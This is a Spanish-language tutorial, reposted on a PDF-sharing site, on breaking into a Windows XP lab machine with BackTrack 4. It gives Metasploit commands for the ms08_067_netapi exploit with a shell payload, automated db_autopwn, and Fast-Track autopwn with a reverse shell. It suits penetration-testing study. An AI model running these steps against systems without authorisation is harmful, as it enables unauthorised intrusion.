PDF de programación - back | track 4 - Acceso a un sistema

Imágen de pdf back | track 4 - Acceso a un sistema

back | track 4 - Acceso a un sistemagráfica de visualizaciones

Publicado el 1 de Marzo del 2019
804 visualizaciones desde el 1 de Marzo del 2019
1,4 MB
14 paginas
Creado hace 14a (04/02/2010)
Acceso a un sistema con Backtrack 4

En este manual veremso algunas de las diferentes formas mas basicas de
como accerder a un sistema utilizando esta gran herramienta (Backtrack
4), tratare de ser lo mas explicativo que pueda.

El acceso a un sistema es el tercer paso de la estructura de un ataque,
por ahora llevamos:

[*]El Reconocimiento (http://electr0s0ft.blogspot.com/2010/01/el-escaneo-
de-un-sistema-es-el.html).

[*]El Escaneo (http://electr0s0ft.blogspot.com/2010/01/reconocimiento-de-
un-sistema-con-bt4-el.html)

Para poder llegar a este paso bien, sabiendo donde estamos “pisando” o
para ubicarnos de que es lo que estamos haciendo tenemos que pasar por el
reconocimiento y el escaneo.

Ya basandonos en los resultados que obtuvimos en la parte de escaneos de
vulnerabilidades de alli podemos empezar a basarnos de por que fallo o
vulnerabilidad podemos aprovechar para acceder al sistema.

Mas que todo este paso utilizaremos mucho el aspecto de aprovechamiento
de vulnerabilidades y nos basaremos en la informacion anteriormente
recopilda.

Introduccion a MSF

Metasploit es una gran herramienta a la hora de explotar fallos de un
sistema, es una gran plataforma que tiene:

[*] 490 exploits
[*] 230 Auxiliary
[*] 192 payloads
[*] 23 encoders

Exploit ---> Es un fracmento de programa o un programa hecho para
explotar un fallo de algun sistema especifico.

Sintaxis en el MSF:

use windows/smb/ms08_067_netapi

Alli le especificamos al metaploit que selecionamos el exploit
windows/smb/ms08_067_netapi.

Payload ---> Lo utilizamos en el metasploit como la accion que se va a
hacer despues de haver explotado el fallo.

Sintaxis en el MSF:

use PAYLOAD windows/shell/bind_tcp

Alli le especificamos al metasploit que seleccionamos el payload

windows/shell/bind_tcp, este payload la accion que ejecuta es de volver
una Shell del sistema que hemos explotado el fallo.

Auxiliary ---> son scripts que suplantan funciones de otros programas.

Sintaxis en el MSF

use fuzzers/ssh/ssh_version_2

Este módulo envía una serie de peticiones SSH con cadenas de versión
maliciosos.

Metasploit #1

En este ejemplo voy a mostrar como aprovecharse de una vulnerabilidad de
un objetivo con sistema operativo windows XP SP2 y SP3.Primeramente
miramos si el equipo esta “vivo”.

Ahora vamos a escanear nuestro equipo ( repaso de escaneo de un sistema
con bt4) en el ejemplo del doc Escaneo de un sistema vamos a tener los
mismo resultados.

Como vemos el puerto 445 esta habilidatado, en el doc de escaneo de un
sistema el nessus nos mostro que ese puerto esta ejecutando un servicio
vulnerable, el exploit para esa vulnerabilidad es el ms08_067_netapi.
Ahora vamos a pasar a configurar el exploit desde metasploit.
Primeramente seleccionamos el exploit

Ahora vamos a configurarlo.

Aquí nos pide el RHOST (seria la direccion IP de nuestro objetivo) luego
nos define por defecto el puerto el 445 que es el que tiene la
vulnerabilidad antes hablada. Y le asignamos direccion IP.ç

Ahora el siguiente paso es asignar el payload y configurarlo. Voy a
utilizar el windows/shell/bind_tcp que es uno de los payload mas basicos
que tiene en BD el metasploit. Ustedes son libres de usar el que ustedes
quieran, si quieren ver mas payload solo es cuestion de teclear show
payloads.

Ahora miramos que opciones tenemos que configurar.

Como vemos aquí ya el metasploit lo definio por defecto, pero aveces nos
va a pedir un LHOST y ese seria nuestra IP entonces para definir la
variable LHOST lo unico que tenemo que hacer es lo siguiente.

Sintaxis en el metastploi:

set LHOST xxx.xxx.xxx.xxx

bueno ahora como ya tenemos todo configurado ahora vamos a ejecutar el
exploit para accerder al sistema.

Estamos dentro del sistema objetivo, exactamante en el cmd ubicado en el

C:\WINDOWS\system32>. Ahora vamos a hacer una prueba.

auto_pwn#2

Esta es un excelente! Herramienta que trae con si el metasploit, esta
herramienta es totalmente automatizada empieza a probar exploit por
exploit hasta que al fin consigue explotar el fallo, tambien se basa en
resultados de un escaneo (nmap, nessus, openvas) y de alli parte para
basar en la explotacion de la vulnerabilidad.

Empezamos!!!

Primeramente vamos a configurar nuestro metasploit para poder empezar con
nuestra intrusion. Creamo una Base de datos en el metasploit donde va a

quedar guardado el resultado del escaneo con nmap.

Ahora vamos a ver que host tenemos definidos para hacer el escaneo.

Si cuando miran que host estan definos y no te aparece nada, solo tenemos
que hacer el escaneo con nmap y hay lo defines automaticamente.

Ahora despues del escaneo nos dirijimos a utilizar el autopwn.

Sintaxis de metasploit:

msf>db_autopwn -t -p -e -x

En la sintaxis lo que estamos haciendo en probar con todos los exploit,
desde cualquier interface de red y que se base en los puerto que tiene
habilitados antes mostrado por el nmap.

Hemos conseguido dos secciones =). despues de probar exploit por exploit
hemos conseguido 2 secciones de meterpreter, ahora solo vamos a
conectarnos a ellas y listo.

Fast track#3

Es un proyecto basado en Python de código abierto destinado a ayudar a
los Pent-Test en un esfuerzo por identificar, explotar. utiliza una gran
parte de la Metasploit Framework para terminar los ataques con éxito.
Fast Track tiene una amplia variedad de ataques únicos que le permiten
utilizar el marco de Metasploit a su máximo potencial. En este ejemplo
vamos a utilizar la opcion de automatizacion que nos ofrece esta
herramienta.

Ahora tecleamos ./fast-track -c 2 para seleccionar la herramienta 2.
Autopwn Automated

Ahora le vamos a especificar al fast-track que vamos a seleccionar el
payload Reverce_tcp y le predefinimos la ip de nuestro objetivo

Lo configuramos de la siguiente manera:

./fast-track.py -c 2 172.16.94.129 -r

y el fast-track lo acepta y empieza nuestro ataque automatizado. Empieza
a interactuar con el metasploit dandole los datos que nosotros le
predefinimos antes, y a ejecutar los sripts de nuestro ataque.

Como vemos primeramente borro la BD pentest del metasploit, luego creo la
base de datos pentest y luego hiso el escaneo con nmap para basarse en el
ataque con auto_pwn.

La siguiente accion que va a ejecutar es el autopwn.

Ahora veremos que esta ejecutando el auto_pwn y empieza a probar exploit
por exploit basandose en el escaneo que hiso con el nmap anteriormente.
Despues de un buen rato de probar exploit por exploit, logramos.

Acabamos de ver 3 formas de como acceder a un sistema partiendo de los
fallos que presentan los servicios que se estan ejecutando en el sistema
objetivo ( Windows XP Sp3 ).

Links de apoyo

[*] http://blip.tv/file/3105815 -----> Intrusion automatizada <auto_pwn>
[*] http://blip.tv/file/3077564 -----> Accediendo a un sistema con bt4

Espero que les halla servido esta documentacion.

------------------------------------------------------------------------

PD: si tengo algun error por favor hagamelo saber.
PD2: si vas a colocar esta documentacion en algun otro lado por favor
respeta los derechos de autor :)

Blog: http://electr0s0ft.blogspot.com/
Correo:[email protected]
[email protected]
  • Links de descarga
http://lwp-l.com/pdf15379

Comentarios de: back | track 4 - Acceso a un sistema (0)


No hay comentarios
 

Comentar...

Nombre
Correo (no se visualiza en la web)
Valoración
Comentarios...
CerrarCerrar
CerrarCerrar
Cerrar

Tienes que ser un usuario registrado para poder insertar imágenes, archivos y/o videos.

Puedes registrarte o validarte desde aquí.

Codigo
Negrita
Subrayado
Tachado
Cursiva
Insertar enlace
Imagen externa
Emoticon
Tabular
Centrar
Titulo
Linea
Disminuir
Aumentar
Vista preliminar
sonreir
dientes
lengua
guiño
enfadado
confundido
llorar
avergonzado
sorprendido
triste
sol
estrella
jarra
camara
taza de cafe
email
beso
bombilla
amor
mal
bien
Es necesario revisar y aceptar las políticas de privacidad